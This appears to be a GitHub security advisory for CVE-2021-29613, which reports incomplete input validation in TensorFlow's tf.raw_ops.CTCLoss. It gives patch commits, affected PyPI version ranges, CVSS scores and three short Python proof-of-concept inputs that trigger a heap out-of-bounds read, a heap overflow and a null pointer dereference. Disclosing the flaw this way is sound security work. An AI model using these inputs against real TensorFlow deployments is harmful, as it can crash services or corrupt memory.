GHSA-VVG4-VGRV-XFR7
Vulnerability from github – Published: 2021-05-21 14:28 – Updated: 2024-11-13 16:25Impact
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap:
import tensorflow as tf
inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)
labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)
labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)
sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)
tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
labels_values=labels_values, sequence_length=sequence_length,
preprocess_collapse_repeated=True, ctc_merge_repeated=False,
ignore_longer_outputs_than_inputs=True)
An attacker can also trigger a heap buffer overflow:
import tensorflow as tf
inputs = tf.constant([], shape=[7, 2, 0], dtype=tf.float32)
labels_indices = tf.constant([-100, -100], shape=[2, 1], dtype=tf.int64)
labels_values = tf.constant([-100, -100], shape=[2], dtype=tf.int32)
sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)
tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
labels_values=labels_values, sequence_length=sequence_length,
preprocess_collapse_repeated=False, ctc_merge_repeated=False,
ignore_longer_outputs_than_inputs=False)
Finally, an attacker can trigger a null pointer dereference:
import tensorflow as tf
inputs = tf.constant([], shape=[0, 2, 11], dtype=tf.float32)
labels_indices = tf.constant([], shape=[0, 2], dtype=tf.int64)
labels_values = tf.constant([], shape=[0], dtype=tf.int32)
sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)
tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
labels_values=labels_values, sequence_length=sequence_length,
preprocess_collapse_repeated=False, ctc_merge_repeated=False,
ignore_longer_outputs_than_inputs=False)
Patches
We have patched the issue in GitHub commit14607c0707040d775e06b6817325640cb4b5864c followed by GitHub commit 4504a081af71514bb1828048363e6540f797005b.
The fix will be included in TensorFlow 2.5.0. We will also cherrypick these commits on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-29613"
],
"database_specific": {
"cwe_ids": [
"CWE-125",
"CWE-665"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-17T21:46:09Z",
"nvd_published_at": "2021-05-14T20:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact \nIncomplete validation in `tf.raw_ops.CTCLoss` allows an attacker to trigger an OOB read from heap:\n\n```python\nimport tensorflow as tf\n\ninputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)\nlabels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)\nlabels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)\nsequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)\n \ntf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,\n labels_values=labels_values, sequence_length=sequence_length,\n preprocess_collapse_repeated=True, ctc_merge_repeated=False,\n ignore_longer_outputs_than_inputs=True)\n``` \n \nAn attacker can also trigger a heap buffer overflow:\n\n```python\nimport tensorflow as tf\n\ninputs = tf.constant([], shape=[7, 2, 0], dtype=tf.float32)\nlabels_indices = tf.constant([-100, -100], shape=[2, 1], dtype=tf.int64)\nlabels_values = tf.constant([-100, -100], shape=[2], dtype=tf.int32)\nsequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)\n\ntf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,\n labels_values=labels_values, sequence_length=sequence_length,\n preprocess_collapse_repeated=False, ctc_merge_repeated=False,\n ignore_longer_outputs_than_inputs=False)\n```\n\nFinally, an attacker can trigger a null pointer dereference:\n\n```python \nimport tensorflow as tf\n\ninputs = tf.constant([], shape=[0, 2, 11], dtype=tf.float32)\nlabels_indices = tf.constant([], shape=[0, 2], dtype=tf.int64)\nlabels_values = tf.constant([], shape=[0], dtype=tf.int32)\nsequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)\n\ntf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,\n labels_values=labels_values, sequence_length=sequence_length,\n preprocess_collapse_repeated=False, ctc_merge_repeated=False,\n ignore_longer_outputs_than_inputs=False)\n```\n\n### Patches\nWe have patched the issue in GitHub commit[14607c0707040d775e06b6817325640cb4b5864c](https://github.com/tensorflow/tensorflow/commit/14607c0707040d775e06b6817325640cb4b5864c) followed by GitHub commit [4504a081af71514bb1828048363e6540f797005b](https://github.com/tensorflow/tensorflow/commit/4504a081af71514bb1828048363e6540f797005b).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick these commits on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.",
"id": "GHSA-vvg4-vgrv-xfr7",
"modified": "2024-11-13T16:25:42Z",
"published": "2021-05-21T14:28:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vvg4-vgrv-xfr7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29613"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/14607c0707040d775e06b6817325640cb4b5864c"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/4504a081af71514bb1828048363e6540f797005b"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-541.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-739.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-250.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/tensorflow/tensorflow"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Incomplete validation in `tf.raw_ops.CTCLoss`"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.